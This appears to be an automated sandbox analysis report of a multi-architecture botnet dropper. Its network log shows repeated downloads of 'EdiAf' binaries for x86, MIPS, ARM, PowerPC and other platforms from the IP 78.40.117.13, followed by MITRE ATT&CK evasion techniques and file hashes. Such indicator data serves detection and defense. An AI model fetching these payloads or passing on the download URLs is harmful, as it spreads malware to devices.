GET http://78.40.117.13/EdiAf.x86HTTP Response
200 -
1.0kB 32.9kB 18 27
HTTP Request
GET http://78.40.117.13/EdiAf.x86HTTP Response
200 -
1.1kB 36.3kB 19 29
HTTP Request
GET http://78.40.117.13/EdiAf.mipsHTTP Response
200 -
1.2kB 36.0kB 21 25
HTTP Request
GET http://78.40.117.13/EdiAf.mipsHTTP Response
200 -
1.4kB 37.7kB 23 29
HTTP Request
GET http://78.40.117.13/EdiAf.mpslHTTP Response
200 -
1.5kB 37.7kB 27 30
HTTP Request
GET http://78.40.117.13/EdiAf.mpslHTTP Response
200 -
1.4kB 35.3kB 24 29
HTTP Request
GET http://78.40.117.13/EdiAf.armHTTP Response
200 -
1.3kB 35.0kB 22 23
HTTP Request
GET http://78.40.117.13/EdiAf.armHTTP Response
200 -
180 B 3
-
1.0kB 23.2kB 16 16
HTTP Request
GET http://78.40.117.13/EdiAf.arm5HTTP Response
200 -
886 B 23.3kB 15 18
HTTP Request
GET http://78.40.117.13/EdiAf.arm5HTTP Response
200 -
1.4kB 39.2kB 24 26
HTTP Request
GET http://78.40.117.13/EdiAf.arm6HTTP Response
200 -
1.5kB 39.3kB 26 28
HTTP Request
GET http://78.40.117.13/EdiAf.arm6HTTP Response
200 -
1.8kB 61.3kB 30 42
HTTP Request
GET http://78.40.117.13/EdiAf.arm7HTTP Response
200 -
1.9kB 61.2kB 33 41
HTTP Request
GET http://78.40.117.13/EdiAf.arm7HTTP Response
200 -
1.1kB 926 B 20 17
-
1.2kB 33.4kB 19 24
HTTP Request
GET http://78.40.117.13/EdiAf.ppcHTTP Response
200 -
1.1kB 33.5kB 19 26
HTTP Request
GET http://78.40.117.13/EdiAf.ppcHTTP Response
200 -
2.4kB 81.1kB 42 57
HTTP Request
GET http://78.40.117.13/EdiAf.m68kHTTP Response
200 -
2.7kB 81.2kB 49 60
HTTP Request
GET http://78.40.117.13/EdiAf.m68kHTTP Response
200 -
2.4kB 78.9kB 42 54
HTTP Request
GET http://78.40.117.13/EdiAf.spcHTTP Response
200 -
2.6kB 78.8kB 48 53
HTTP Request
GET http://78.40.117.13/EdiAf.spcHTTP Response
200 -
473 B 640 B 6 4
HTTP Request
GET http://78.40.117.13/EdiAf.i686HTTP Response
404 -
406 B 584 B 6 4
HTTP Request
GET http://78.40.117.13/EdiAf.i686HTTP Response
404 -
1.9kB 69.7kB 32 49
HTTP Request
GET http://78.40.117.13/EdiAf.sh4HTTP Response
200 -
1.7kB 69.6kB 31 47
HTTP Request
GET http://78.40.117.13/EdiAf.sh4HTTP Response
200 -
472 B 639 B 6 4
HTTP Request
GET http://78.40.117.13/EdiAf.arcHTTP Response
404 -
405 B 583 B 6 4
HTTP Request
GET http://78.40.117.13/EdiAf.arcHTTP Response
404
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5e932653d32b429c51de2046623fa71d2
SHA132ecc535e6cf6e99f105835d4a7cb75ef4cb233a
SHA25687dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612
SHA512e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2
-
Filesize
33KB
MD5029a7185777b7f885a6c3807e46b7365
SHA187372b0029b72446861c7b429e3ef1626c337218
SHA25642c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d
SHA5124890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8
-
Filesize
35KB
MD57327f58c0e15f6086301a81780e100dc
SHA1292bb04ad4df407ac687ef1df1071659708bd3bb
SHA256b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d
SHA5124cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911
-
Filesize
32KB
MD5addb1cd662dd870b9b7ed5273d6fa76e
SHA16e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0
SHA256cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7
SHA51228525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f
-
Filesize
21KB
MD5a117b1b367633cb07f0795bd5f0c6f8f
SHA132bfac42c7134383c6381b94c0d75317fcb56d11
SHA25640fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0
SHA5127e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726
-
Filesize
75KB
MD5642dff628df548a6c458f004fd3b5aa1
SHA1cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7
SHA256219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed
SHA512dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851